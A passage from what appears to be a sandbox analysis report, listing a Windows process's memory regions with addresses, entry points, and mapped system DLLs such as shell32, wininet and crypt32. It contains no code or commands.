0x7fefbd0c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 723 start_va = 0x7fefbd50000 end_va = 0x7fefbe41fff monitored = 0 entry_point = 0x7fefbd7ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 724 start_va = 0x7fefbe50000 end_va = 0x7fefc064fff monitored = 0 entry_point = 0x7fefc0264b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 725 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 726 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 727 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 728 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 729 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 730 start_va = 0x7fefc450000 end_va = 0x7fefc559fff monitored = 0 entry_point = 0x7fefc451010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 731 start_va = 0x7fefc560000 end_va = 0x7fefc739fff monitored = 0 entry_point = 0x7fefc563130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 732 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 733 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 734 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 735 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 736 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 737 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 738 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 739 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 740 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 741 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 742 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 743 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 744 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 745 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 746 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 747 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 748 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 749 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 750 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 751 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 752 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 753 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 754 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 755 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 756 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 757 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 758 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 759 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 760 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 761 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 762 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 763 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 764 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 765 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 766 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 767 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 768 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 769 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 770 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 771 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 772 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 773 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 774 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 775 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 776 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 777 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 778 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 779 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 780 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 781 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 782 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 783 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 784 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 785 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 786 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 787 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 788 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 789 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 790 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 791 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 792 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 793 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 794 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 795 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 796 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 797 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 798 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 799 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 800 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 801 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 802 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 803 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 804 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 805 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 806 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 807 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 808 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 810 start_va = 0x3940000 end_va = 0x3955fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003940000" filename = "" Region: id = 811 start_va = 0x7cf0000 end_va = 0x7d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cf0000" filename = "" Region: id = 812 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 813 start_va = 0x7d70000 end_va = 0x7f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d70000" filename = "" Region: id = 814 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 815 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 816 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 817 start_va = 0x7d70000 end_va = 0x7e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d70000" filename = "" Region: id = 818 start_va = 0x7f10000 end_va = 0x7f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f10000" filename = "" Region: id = 819 start_va = 0x3960000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003960000" filename = "" Region: id = 820 start_va = 0x7e60000 end_va = 0x7edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e60000" filename = "" Region: id = 821 start_va = 0x8010000 end_va = 0x808ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008010000" filename = "" Region: id = 822 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 823 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 824 start_va = 0x3960000 end_va = 0x3973fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003960000" filename = "" Region: id = 825 start_va = 0x3a10000 end_va = 0x3a1dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a10000" filename = "" Region: id = 826 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 827 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 828 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 829 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 830 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 831 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 832 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 833 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 834 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 835 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 836 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 837 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 838 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 839 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 840 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 841 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 842 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 843 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 844 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 845 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 846 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 847 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 848 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 849 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 850 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 851 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 852 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 853 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 854 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 855 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 856 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 857 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 858 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 859 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 860 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 861 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 862 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 863 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 864 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 865 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 866 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 867 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 868 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 869 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 870 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 871 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 872 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 873 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 874 start_va = 0x3960000 end_va = 0x396dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003960000" filename = "" Region: id = 875 